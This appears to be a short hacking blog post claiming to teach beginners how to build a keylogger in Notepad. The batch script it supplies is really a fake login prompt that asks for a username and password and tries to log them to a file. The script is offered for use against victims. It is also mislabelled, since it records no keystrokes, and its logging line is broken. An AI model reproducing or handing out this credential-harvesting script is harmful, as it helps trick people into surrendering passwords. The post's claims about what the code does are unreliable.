The key-logger is one of the oldest tools in the world of hacking, but despite this, it is still effective. Next ,i'm going to show you how to create key-logger in a simple way, using notepad. What is Key-logger? A key-logger is a type of spyware that records all keystrokes on victims computer secretly. Key-logger are widely used by cyber-criminals to obtain information on bank accounts and credit cards, data such as usernames, passwords, and other personal information . HOW TO MAKE A KEY-LOGGER? Here is a basic key-logger script for beginners to understand the basics of how key-logging works in notepad. Open notepad on your Windows and paste the script given below. @echo off color a title Login cls echo Please Enter Your Email Address and Password echo. echo. cd C:\Logs set /p user= Username: set /p pass=Password: echo Username="%user%" Password="%pass%" Log.txt start http://TechiViewer.com/ exit ...
Update yourself to the emerging Technology.





Comments
Post a Comment